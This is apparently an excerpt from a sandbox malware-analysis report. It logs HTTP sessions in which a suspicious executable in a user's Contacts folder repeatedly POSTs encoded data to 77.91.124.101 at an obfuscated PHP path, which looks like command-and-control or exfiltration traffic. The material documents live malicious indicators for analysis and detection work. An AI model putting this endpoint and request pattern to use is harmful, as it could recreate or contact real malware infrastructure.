Nov 21, 2023 04:48:51.500138998 CET	654	OUT	Data Raw: 57 51 58 5f 5b 53 5a 5c 5d 57 55 57 55 59 57 50 50 5a 58 42 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQX_[SZ\]WUWUYWPPZXBVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y)(1(%)#_,$64\)<#"Q0=90.S9;>?'Y-.&G''^)
Nov 21, 2023 04:48:51.702452898 CET	655	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.5	49840	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:50.064968109 CET	651	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:50.263237000 CET	651	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:51.500138998 CET	654	OUT	Data Raw: 57 51 58 5f 5b 53 5a 5c 5d 57 55 57 55 59 57 50 50 5a 58 42 56 54 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQX_[SZ\]WUWUYWPPZXBVTW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y)(1(%)#_,$64\)<#"Q0=90.S9;>?'Y-.&G''^)
Nov 21, 2023 04:48:51.702452898 CET	655	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	77.91.124.101	80	192.168.2.5	49841	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:51.698138952 CET	655	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:51.894644976 CET	656	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:51.895076990 CET	657	OUT	Data Raw: 52 5a 58 59 5e 5e 5a 5b 5d 57 55 57 55 58 57 53 50 59 58 44 56 5e 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXY^^Z[]WUWUXWSPYXDV^WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);=^<;-?0#^.$) 9!X(39$-W'.;=</#/>&G''^)?
Nov 21, 2023 04:48:52.096456051 CET	661	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:51 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 00 25 2c 20 58 21 20 2f 57 29 39 29 19 2d 58 39 1a 3c 55 29 5e 31 5b 20 12 27 39 0f 54 3c 01 3c 5d 33 07 30 13 23 50 2c 5b 2a 30 21 5a 0c 1d 26 18 22 38 30 0d 28 10 3f 01 2b 13 28 18 26 1f 2f 14 2b 3e 0e 0c 20 0d 3f 58 25 23 20 1a 38 06 2e 03 2d 28 00 45 25 12 32 5f 37 2d 23 5f 0c 14 27 50 36 0f 0d 5e 20 09 22 56 22 37 16 15 20 0a 28 0e 30 04 28 1c 26 3b 22 05 28 3b 30 57 32 0e 24 50 33 29 33 1d 32 39 01 1c 28 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%, X! /W)9)-X9<U)^1[ '9T<<]30#P,[0!Z&"80(?+(&/+> ?X%# 8.-(E%2_7-#_'P6^ "V"7 (0(&;"(;0W2$P3)329(&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.5	49841	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:51.698138952 CET	655	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:51.894644976 CET	656	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:51.895076990 CET	657	OUT	Data Raw: 52 5a 58 59 5e 5e 5a 5b 5d 57 55 57 55 58 57 53 50 59 58 44 56 5e 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXY^^Z[]WUWUXWSPYXDV^WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$);=^<;-?0#^.$) 9!X(39$-W'.;=</#/>&G''^)?
Nov 21, 2023 04:48:52.096456051 CET	661	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:51 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 21 00 25 2c 20 58 21 20 2f 57 29 39 29 19 2d 58 39 1a 3c 55 29 5e 31 5b 20 12 27 39 0f 54 3c 01 3c 5d 33 07 30 13 23 50 2c 5b 2a 30 21 5a 0c 1d 26 18 22 38 30 0d 28 10 3f 01 2b 13 28 18 26 1f 2f 14 2b 3e 0e 0c 20 0d 3f 58 25 23 20 1a 38 06 2e 03 2d 28 00 45 25 12 32 5f 37 2d 23 5f 0c 14 27 50 36 0f 0d 5e 20 09 22 56 22 37 16 15 20 0a 28 0e 30 04 28 1c 26 3b 22 05 28 3b 30 57 32 0e 24 50 33 29 33 1d 32 39 01 1c 28 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: !%, X! /W)9)-X9<U)^1[ '9T<<]30#P,[0!Z&"80(?+(&/+> ?X%# 8.-(E%2_7-#_'P6^ "V"7 (0(&;"(;0W2$P3)329(&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.5	49842	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:51.831931114 CET	656	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:52.030527115 CET	658	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.031117916 CET	660	OUT	Data Raw: 52 5b 58 50 5b 5c 5f 5e 5d 57 55 57 55 5b 57 53 50 59 58 46 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XP[\_^]WUWU[WSPYXFV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*<+=U;_,'.^ 2(#-$-.3 19(&(<+->&G''^)3
Nov 21, 2023 04:48:52.234703064 CET	661	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	77.91.124.101	80	192.168.2.5	49842	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:51.831931114 CET	656	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:52.030527115 CET	658	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.031117916 CET	660	OUT	Data Raw: 52 5b 58 50 5b 5c 5f 5e 5d 57 55 57 55 5b 57 53 50 59 58 46 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XP[\_^]WUWU[WSPYXFV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*<+=U;_,'.^ 2(#-$-.3 19(&(<+->&G''^)3
Nov 21, 2023 04:48:52.234703064 CET	661	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.5	49843	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:52.554563046 CET	662	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:52.759457111 CET	662	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.759687901 CET	665	OUT	Data Raw: 52 5a 58 50 5b 5d 5f 5e 5d 57 55 57 55 57 57 52 50 53 58 48 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXP[]_^]WUWUWWRPSXHVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)^5X?=>30,B6Z :9(9$[='3.,;<8/&G''^)
Nov 21, 2023 04:48:52.963704109 CET	665	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	77.91.124.101	80	192.168.2.5	49843	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:52.554563046 CET	662	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:52.759457111 CET	662	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:52.759687901 CET	665	OUT	Data Raw: 52 5a 58 50 5b 5d 5f 5e 5d 57 55 57 55 57 57 52 50 53 58 48 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXP[]_^]WUWUWWRPSXHVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)^5X?=>30,B6Z :9(9$[='3.,;<8/&G''^)
Nov 21, 2023 04:48:52.963704109 CET	665	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.5	49844	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:53.289393902 CET	666	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:53.486891031 CET	666	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:53.487193108 CET	668	OUT	Data Raw: 52 5c 5d 5b 5e 58 5f 59 5d 57 55 57 55 59 57 5a 50 5d 58 48 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\][^X_Y]WUWUYWZP]XHVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'![?+!?3(85 :9?R$=*0).+)><;;&G''^)
Nov 21, 2023 04:48:53.689637899 CET	669	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	77.91.124.101	80	192.168.2.5	49844	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:53.289393902 CET	666	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:53.486891031 CET	666	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:53.487193108 CET	668	OUT	Data Raw: 52 5c 5d 5b 5e 58 5f 59 5d 57 55 57 55 59 57 5a 50 5d 58 48 56 52 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\][^X_Y]WUWUYWZP]XHVRWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'![?+!?3(85 :9?R$=*0).+)><;;&G''^)
Nov 21, 2023 04:48:53.689637899 CET	669	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	77.91.124.101	80	192.168.2.5	49725	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:34.678030968 CET	193	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:34.875669003 CET	193	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:34.875929117 CET	196	OUT	Data Raw: 52 5b 58 5a 5b 5f 5f 5a 5d 57 55 57 55 59 57 50 50 5f 58 48 56 52 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XZ[__Z]WUWUYWPP_XHVRW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*6=+T=(/$] 5(3>9$#.V:>_<7;&G''^)
Nov 21, 2023 04:47:35.080408096 CET	196	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49725	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:34.678030968 CET	193	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:34.875669003 CET	193	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:34.875929117 CET	196	OUT	Data Raw: 52 5b 58 5a 5b 5f 5f 5a 5d 57 55 57 55 59 57 50 50 5f 58 48 56 52 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[XZ[__Z]WUWUYWPP_XHVRW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*6=+T=(/$] 5(3>9$#.V:>_<7;&G''^)
Nov 21, 2023 04:47:35.080408096 CET	196	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.5	49845	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:54.002024889 CET	670	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:54.198462009 CET	670	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:54.198731899 CET	672	OUT	Data Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
Nov 21, 2023 04:48:54.400331020 CET	673	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	77.91.124.101	80	192.168.2.5	49845	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:54.002024889 CET	670	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:54.198462009 CET	670	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:54.198731899 CET	672	OUT	Data Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
